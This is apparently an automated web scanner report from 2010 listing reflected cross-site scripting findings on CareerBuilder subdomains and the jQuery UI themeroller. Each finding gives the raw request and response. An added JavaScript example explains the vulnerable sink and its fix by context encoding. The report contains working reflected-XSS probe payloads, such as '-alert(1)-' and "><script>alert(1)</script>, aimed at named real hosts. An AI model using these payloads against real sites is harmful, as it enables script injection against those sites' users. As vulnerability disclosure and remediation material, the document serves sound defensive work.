<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
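The five lr findings on this page share one sink: the parameter is concatenated into the single-quoted `CB.AJAX.Login._registerURL` literal shown in the response excerpt, so the scanner's `X'-alert(1)-'Y` probe turns the assignment into `'…' - alert(1) - '…'`. The block below is an added example, not code from the report or from CareerBuilder; the three `render*` functions are hypothetical reconstructions of the server-side template, and only the shape of the emitted statement comes from the response. It also shows the half-fix a developer is likely to reach for first (URL-encoding the value) and why it does not help against this particular probe.

```javascript
// Added example, not code from the scan report or from CareerBuilder: a
// reconstruction of the sink seen in the response,
//   CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=...&ff=21';
// showing why X'-alert(1)-'Y executes there and which encoding closes it.
// renderVulnerable / renderUrlEncodedOnly / renderFixed are hypothetical
// server-side templates; only the output shape comes from the report.

const REGISTER_BASE = 'https://www.careerbuilder.com/Share/Register.aspx';

// The value sent in the report's request (original value cbcb_mh + scanner probe).
const PROBE_LR = "cbcb_mh8b493'-alert(1)-'1a957c281b6";

// Vulnerable: raw parameter concatenated into script source, echoed unmodified.
function renderVulnerable(lr) {
  return `CB.AJAX.Login._registerURL = '${REGISTER_BASE}?lr=${lr}&ff=21';`;
}

// A common half-fix. encodeURIComponent leaves ' ( ) - untouched (they are
// unreserved in a URI), so this probe passes through byte for byte.
function renderUrlEncodedOnly(lr) {
  return `CB.AJAX.Login._registerURL = '${REGISTER_BASE}?lr=${encodeURIComponent(lr)}&ff=21';`;
}

// Encode for a JavaScript string literal: everything outside [A-Za-z0-9]
// becomes \xHH or \uHHHH. Unlike JSON.stringify this also neutralises '<'
// and '/', so the literal can never contain a raw </script> either.
function jsStringEncode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (/[A-Za-z0-9]/.test(ch)) { out += ch; continue; }
    const code = s.charCodeAt(i);
    out += code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  }
  return out;
}

// Fixed: encode for each context, innermost first. The value is a query
// parameter (URL-encode it), and that URL sits in a JS literal (JS-encode it).
function renderFixed(lr) {
  const urlSafe = encodeURIComponent(lr);
  return `CB.AJAX.Login._registerURL = '${REGISTER_BASE}?lr=${jsStringEncode(urlSafe)}&ff=21';`;
}

// Run the rendered statement the way the browser would, with `alert`
// replaced by a spy. Returns whether the spy fired and what the assignment
// produced. Demo harness only: never evaluate untrusted markup like this
// outside a test.
function payloadExecutes(script) {
  const login = {};
  let fired = false;
  try {
    new Function('CB', 'alert', script)({ AJAX: { Login: login } }, () => { fired = true; });
  } catch (e) {
    // A syntax or runtime error means the statement did not run to completion;
    // `fired` already records whether alert was reached before that point.
  }
  return { fired, registerURL: login._registerURL };
}

console.log('vulnerable      :', payloadExecutes(renderVulnerable(PROBE_LR)).fired);      // true
console.log('url-encoded only:', payloadExecutes(renderUrlEncodedOnly(PROBE_LR)).fired); // true
console.log('fixed           :', payloadExecutes(renderFixed(PROBE_LR)).fired);          // false
console.log(payloadExecutes(renderFixed(PROBE_LR)).registerURL);
```

The order of the two encodings matters: the URL encoding is applied first because it is the innermost context, and the JavaScript encoding is applied last because that is the context the browser decodes first. On the .NET 2.0 runtime advertised in these responses there is no built-in `HttpUtility.JavaScriptStringEncode` (that arrived in .NET 4); the Microsoft AntiXSS library's JavaScript encoder, or the hex-escaping approach above, fills that gap. The spy-based `payloadExecutes` check is also a cheap regression test to keep beside the template once it is fixed.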
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3041b'-alert(1)-'6d3b4ce97bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&SiteID=cbcb_mh038 HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196142 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=e3a92f7a94bb4aefad32a22492f2f8ec-343070882-wj-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6503492847FF777B22F8576D0825F22D3B746B718754B54EA145BAD3B556B5A7EA8F7DE56AA62C5B566; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:02 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:02 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR20 Date: Sun, 14 Nov 2010 22:28:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 749c6"%20a%3db%20751bb406a83 was submitted in the lr parameter. This input was echoed as 749c6" a=b 751bb406a83 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh749c6"%20a%3db%20751bb406a83&SiteID=cbcb_mh038 HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 195292 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=47aedb72ac304fa681c636fd69677a9d-343070852-XA-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500EA1D41B61C64B6248A474FC3460AF4AEC050CF26BFBC579150EA207841BA8141D97498AE19DB109; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:32 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:33 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR41 Date: Sun, 14 Nov 2010 22:27:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd998"%20a%3db%20b05fa222a32 was submitted in the lr parameter. This input was echoed as cd998" a=b b05fa222a32 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mhcd998"%20a%3db%20b05fa222a32&SiteID=cbcb_mh093 HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 183263 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=ecdb0331cb464a329fd1c80ad18f7967-343070959-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650CC4B7FEBB57BA953BF422DB350B4E9BA73F80F19EB0362A5B01665D8C3627263610414ED49AA948E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:19 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:19 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:29:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ef3'-alert(1)-'1222dc2a568 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&SiteID=cbcb_mh093 HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 183635 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=fe5cf099e2404089ab2ae0bf03c8cc69-343070985-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6504D3DF8B2F19A076E592FF6AA46ECF05B008D780A8FC101ADEA09DA48E869B6649FEEDA7F13873918; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:45 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:46 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:29:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a656a"%20a%3db%203feb96be110 was submitted in the lr parameter. This input was echoed as a656a" a=b 3feb96be110 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mha656a"%20a%3db%203feb96be110&SiteID=cbcb_mh041 HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194193 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1e5701970477412aa75465747cf51d58-343070973-VK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650865DE06C3AE6A4BBB8F6A0661D0455222BAE02B5150F8E67A38F6CB311BAA009D670CCB1DAF5CA4A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:33 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:33 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL32 Date: Sun, 14 Nov 2010 22:29:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba05'-alert(1)-'20bdb4e6d83 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&SiteID=cbcb_mh041 HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194902 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=7bfbfd0022de40daa96f627df37564bf-343070993-RM-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501E658FA81FEF0DB60921B25D8E4F2FE04403B3C7B2678EDE05E651406E1D89EA5E4984F4B9384687; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:53 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL22 Date: Sun, 14 Nov 2010 22:29:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54914"%20a%3db%2095f3352e48e was submitted in the lr parameter. This input was echoed as 54914" a=b 95f3352e48e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh54914"%20a%3db%2095f3352e48e&SiteID=cbcb_mh042 HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190767 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1eebfb60fe96456d8a3b98a9516e4751-343070978-RB-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508E9F867635F13D3D0437D5790B86ED02ADDD09ED97BAA2FC74B7E92B73F8C7F44E1FFD0AA13E1555; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:37 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:38 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL11 Date: Sun, 14 Nov 2010 22:29:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fd5'-alert(1)-'67f3434df66 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&SiteID=cbcb_mh042 HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 191425 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=78df5155179941aab241f0efdb48ee86-343070998-RN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650E36B0C4DEFC08F5BFE7A35E645C2838A9BCADFD76C078D6DE946337E6A1CF3E4E66BD1632AD26272; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL23 Date: Sun, 14 Nov 2010 22:29:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8fa"%20a%3db%2093e8de4ffcf was submitted in the lr parameter. This input was echoed as 5a8fa" a=b 93e8de4ffcf in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhf48aa5a8fa"%20a%3db%2093e8de4ffcf HTTP/1.1 Host: jobs.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 214959 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=a65b5fb365ae44cc8b49eabc5ccc3421-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65071F320652C53B5FA10158B2D35DBDE6BFEC751AD5160D38F3BC3DA535E23566CDCE239E7AB373819; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:34:52 GMT; path=/; HttpOnly Set-Cookie: CB%5FSID=83c8a36c2e2640f4b9534cdd2b31d1d8-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: CB%5FSID=7b43206340c54fa09d034e175604b78b-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL35 Date: Sun, 14 Nov 2010 23:34:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3ae"><script>alert(1)</script>e4b0ad6907f was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bb"><script>alert(1)</script>5966d356e19 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1fc"><script>alert(1)</script>492295ded91 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
